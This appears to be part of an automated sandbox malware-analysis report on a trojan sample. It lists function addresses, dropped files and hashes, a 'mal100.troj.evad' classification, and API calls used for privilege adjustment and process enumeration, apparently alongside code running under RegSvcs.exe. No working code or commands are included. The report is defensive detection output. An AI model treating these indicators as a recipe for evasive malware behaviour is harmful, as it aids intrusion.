                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008592407_2_00859240
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008594997_2_00859499
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008717247_2_00871724
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_00871A967_2_00871A96
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_00877BAB7_2_00877BAB
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_00859B607_2_00859B60
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_00877DDA7_2_00877DDA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_00871D407_2_00871D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00418BF314_2_00418BF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004031C014_2_004031C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0042F2C314_2_0042F2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004103E314_2_004103E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040255014_2_00402550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402D2014_2_00402D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402D2214_2_00402D22
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00416DEE14_2_00416DEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00416DF314_2_00416DF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041060314_2_00410603
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040E60314_2_0040E603
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040E74714_2_0040E747
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040E75314_2_0040E753
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040E79C14_2_0040E79C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A901AA14_2_01A901AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A841A214_2_01A841A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A881CC14_2_01A881CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C010014_2_019C0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6A11814_2_01A6A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A5815814_2_01A58158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6200014_2_01A62000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A903E614_2_01A903E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DE3F014_2_019DE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8A35214_2_01A8A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A502C014_2_01A502C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7027414_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A9059114_2_01A90591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D053514_2_019D0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7E4F614_2_01A7E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7442014_2_01A74420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8244614_2_01A82446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CC7C014_2_019CC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F475014_2_019F4750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D077014_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EC6E014_2_019EC6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A9A9A614_2_01A9A9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A014_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E696214_2_019E6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019B68B814_2_019B68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE8F014_2_019FE8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DA84014_2_019DA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D284014_2_019D2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A86BD714_2_01A86BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8AB4014_2_01A8AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CEA8014_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E8DBF14_2_019E8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CADE014_2_019CADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DAD0014_2_019DAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6CD1F14_2_01A6CD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70CB514_2_01A70CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C0CF214_2_019C0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0C0014_2_019D0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4EFA014_2_01A4EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C2FC814_2_019C2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DCFE014_2_019DCFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A12F2814_2_01A12F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A72F3014_2_01A72F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F0F3014_2_019F0F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A44F4014_2_01A44F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E2E9014_2_019E2E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8CE9314_2_01A8CE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8EEDB14_2_01A8EEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8EE2614_2_01A8EE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0E5914_2_019D0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DB1B014_2_019DB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A9B16B14_2_01A9B16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A0516C14_2_01A0516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BF17214_2_019BF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A870E914_2_01A870E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8F0E014_2_01A8F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D70C014_2_019D70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7F0CC14_2_01A7F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A1739A14_2_01A1739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8132D14_2_01A8132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BD34C14_2_019BD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D52A014_2_019D52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A712ED14_2_01A712ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EB2C014_2_019EB2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6D5B014_2_01A6D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A995C314_2_01A995C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8757114_2_01A87571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8F43F14_2_01A8F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C146014_2_019C1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8F7B014_2_01A8F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A816CC14_2_01A816CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A1563014_2_01A15630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6591014_2_01A65910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D995014_2_019D9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EB95014_2_019EB950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D38E014_2_019D38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3D80014_2_01A3D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EFB8014_2_019EFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A45BF014_2_01A45BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A0DBF914_2_01A0DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8FB7614_2_01A8FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A15AA014_2_01A15AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A71AA314_2_01A71AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6DAAC14_2_01A6DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7DAC614_2_01A7DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A43A6C14_2_01A43A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8FA4914_2_01A8FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A87A4614_2_01A87A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EFDC014_2_019EFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A87D7314_2_01A87D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D3D4014_2_019D3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A81D5A14_2_01A81D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8FCF214_2_01A8FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A49C3214_2_01A49C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D1F9214_2_019D1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8FFB114_2_01A8FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01993FD214_2_01993FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01993FD514_2_01993FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8FF0914_2_01A8FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D9EB014_2_019D9EB0
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_017C6B7015_3_017C6B70
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_017C6B7215_3_017C6B72
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_017C5B6015_3_017C5B60
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_017C5B5915_3_017C5B59
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180CFA815_3_0180CFA8
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180CFA815_3_0180CFA8
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180BED815_3_0180BED8
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180BED815_3_0180BED8
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_017C701015_3_017C7010
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180DC1815_3_0180DC18
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180DC1815_3_0180DC18
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_017C52D015_3_017C52D0
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_017C63A015_3_017C63A0
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180C76115_3_0180C761
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180C76115_3_0180C761
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180C76815_3_0180C768
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180C76815_3_0180C768
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180D77815_3_0180D778
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180D77815_3_0180D778
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180D77A15_3_0180D77A
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180D77A15_3_0180D77A
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180CFA815_3_0180CFA8
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180CFA815_3_0180CFA8
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180BED815_3_0180BED8
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180BED815_3_0180BED8
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180DC1815_3_0180DC18
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180DC1815_3_0180DC18
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180C76115_3_0180C761
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180C76115_3_0180C761
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180C76815_3_0180C768
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180C76815_3_0180C768
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180D77815_3_0180D778
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180D77815_3_0180D778
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180D77A15_3_0180D77A
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180D77A15_3_0180D77A
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180CFA815_3_0180CFA8
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180CFA815_3_0180CFA8
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180BED815_3_0180BED8
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180BED815_3_0180BED8
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180DC1815_3_0180DC18
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180DC1815_3_0180DC18
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180C76115_3_0180C761
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180C76115_3_0180C761
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180C76815_3_0180C768
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180C76815_3_0180C768
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180D77815_3_0180D778
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180D77815_3_0180D778
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180D77A15_3_0180D77A
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_0180D77A15_3_0180D77A
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0035803715_2_00358037
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0035200715_2_00352007
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0034E0BE15_2_0034E0BE
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0033E1A015_2_0033E1A0
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0033225D15_2_0033225D
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0036A28E15_2_0036A28E
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003522C215_2_003522C2
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0034C59E15_2_0034C59E
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003BC7A315_2_003BC7A3
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0036E89F15_2_0036E89F
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003A291A15_2_003A291A
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_00366AFB15_2_00366AFB
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_00398B2715_2_00398B27
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0035CE3015_2_0035CE30
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0036716915_2_00367169
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003C51D215_2_003C51D2
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0033924015_2_00339240
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0033949915_2_00339499
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0035172415_2_00351724
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_00351A9615_2_00351A96
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_00339B6015_2_00339B60
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_00357BAB15_2_00357BAB
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_00351D4015_2_00351D40
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_00357DDA15_2_00357DDA
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2.exe 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01A4F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01A3EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01A05130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01A17E54 appears 110 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 019BB970 appears 280 times
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: String function: 002657D8 appears 67 times
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: String function: 00266630 appears 31 times
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: String function: 002657A5 appears 34 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: String function: 01195111 appears 67 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: String function: 011951A3 appears 36 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: String function: 00874CF3 appears 31 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: String function: 00870DC0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: String function: 0119516F appears 36 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: String function: 0086FD60 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: String function: 0034FD60 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: String function: 00350DC0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: String function: 00354CF3 appears 31 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 196
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs FX6KTgnipP.exe
                Source: FX6KTgnipP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.evad.winEXE@40/50@0/0
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0024932C GetLastError,FormatMessageW,_wcslen,LocalFree,0_2_0024932C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008B194F AdjustTokenPrivileges,CloseHandle,7_2_008B194F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008B1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,7_2_008B1F53
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0039194F AdjustTokenPrivileges,CloseHandle,15_2_0039194F
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_00391F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,15_2_00391F53
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008C5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,7_2_008C5B27
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008BDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,7_2_008BDC9C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008D4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,7_2_008D4089
